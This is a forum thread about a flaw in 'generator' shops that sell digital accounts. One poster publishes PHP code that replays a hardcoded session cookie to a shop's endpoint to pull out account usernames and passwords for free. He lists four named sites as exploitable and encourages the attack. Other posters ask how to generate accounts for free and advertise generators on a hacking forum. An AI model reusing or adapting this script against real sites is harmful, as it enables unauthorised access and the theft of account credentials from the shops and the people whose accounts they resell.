
Topic: Public Announcement for Digital Goods Generator shops. Exploit (Read 1146 times)

sr. member
Activity: 269
Merit: 250
Is it possible with this exploit that people can generate accounts for free?

yeah you can do a lot...

https://bitcointalksearch.org/topic/--1148789
hero member
Activity: 686
Merit: 500
Is it possible with this exploit that people can generate accounts for free?
sr. member
Activity: 269
Merit: 250
I do run the best generator on Hackforums, yep.


alright hit u up a pm
newbie
Activity: 6
Merit: 0
I do run the best generator on Hackforums, yep.
sr. member
Activity: 269
Merit: 250
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took too long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.

You own a shop too?
newbie
Activity: 6
Merit: 0
I tried hiring a coder to get the vulns fixed but everyone was an idiot and took too long to reply or didn't reply... so if somebody wants to fix the vulns I'd gladly pay them for mine.
sr. member
Activity: 269
Merit: 250
https://bitcointalksearch.org/topic/m.12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?

That version is fixed that I have but seems the owners are too hot headed to ignore me. So here I am.
newbie
Activity: 9
Merit: 0
https://bitcointalksearch.org/topic/m.12540096

Should the owners of those accounts buy from here? As I'm guessing the 1 in the link has no exploit?
sr. member
Activity: 269
Merit: 250
Hey guys, so I have been contacting multiple gen shop owners about this exploit, but they either become very defensive or just end up trying to make up lies. Then they begin to act very rude to me.

Update: after this announcement owner of script gave up and doesn't know how to fix the script lol

I was very firm about not posting the exploit but due to multiple threats and lies from them I will just be posting it.

Disclaimer: It is not my fault if their site gets hacked as I warned them and they encouraged me to post. So if any owners blame me they already gave me permission to do so.

There is a 2nd exploit that dumps more stuff but that will be kept private for obvious reasons as it would not be allowed to be posted here

Alright, so the exploit is PHP code that you can host anywhere. Don't bother asking me how to use this, as you must already know what this does and how to use it.

The new owner of this source has been lying to members that this was a v1 exploit, but it still works on v2 and the new owner has never updated the source at all! All he did was rename it, which can be confirmed by talking to the original owner.

Code:
if($_GET['auth']=="max"){
$url = '';

$options = array(
    'http' => array(
        'method'  => 'POST',
        'header'  =>   "Host:
" .
                "User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
" .
                "X-Requested-With: XMLHttpRequest
" .
                "Cookie: ; remember_82e5d2c56bdd0811318f0cf078b78bfc=eyJpdiI6ImxuR21neVJucWE0VXRZYXpGd29WeXc9PSIsInZhbHVlIjoiOG1FM2NheHBGRUVDdE1qK2N4NzR0OGhUK3FxTE1zMEI4SzhmRGhsMHYwK2FEdkZTcjF1VlwvZDVsZE9tVTc0MFZuaHBxR2VxR1VSemdUczQyNjFIdFMxS3o0MzkrMW80Z2ZvOHlyXC9haHlPVT0iLCJtYWMiOiIzMmQ2OTI4MTk3OTI3NjVlYWNiZmFiMmVmNmZkZmQ3MTM0NDY5ZjBmY2RmOTQ1ODM5YTYwNWUzNGIzN2MxNDQzIn0%3D; __utma=191036587.1210061233.1437918069.1437944919.1437986125.3; __utmb=191036587.12.10.1437986125; __utmc=191036587; __utmz=191036587.1437918069.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mcdispenser=eyJpdiI6Im1xa1ZJR3ZBMmhxOFE1eEpCSFI3eXc9PSIsInZhbHVlIjoiR2ZqTUZLQU12YWVUQTNkWkRka2U5MU90QUR4WVlJMWdhTWNKdTBTNEMwV0VBc09xOTZKT1RhRXQ1bkc5SVlrS1NkNFh5MlJ6MHBYVjQxcU5pTVwvNXl3PT0iLCJtYWMiOiJhMTRkMTNiNWI0MDM1ZTYxNmNkOGRjYzBiYmFkYjQzNTZhMDI0ZmQzZTE1NDQxYTQ5MTYyYWE4MGQ2ODdkMmIyIn0%3D


",
    ),
);
$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);
$up = json_decode($result);
$user = $up->username;
$pass = $up->password;
if($up->error == 'You may only generate an account once every 3 seconds.'){
echo 'err_3s';
}else{
echo $user . ':' . $pass;
}
}else{
echo "You aren't authorized to use this api!";
}
?>



Current shops exploitable:
premiumgen.xyz
vzngen.net
25cams.com
raidgenerator.com

Also any shops you find that use similar source. There is currently only 1 shop I know here that has a fixed source and it's not the ones above.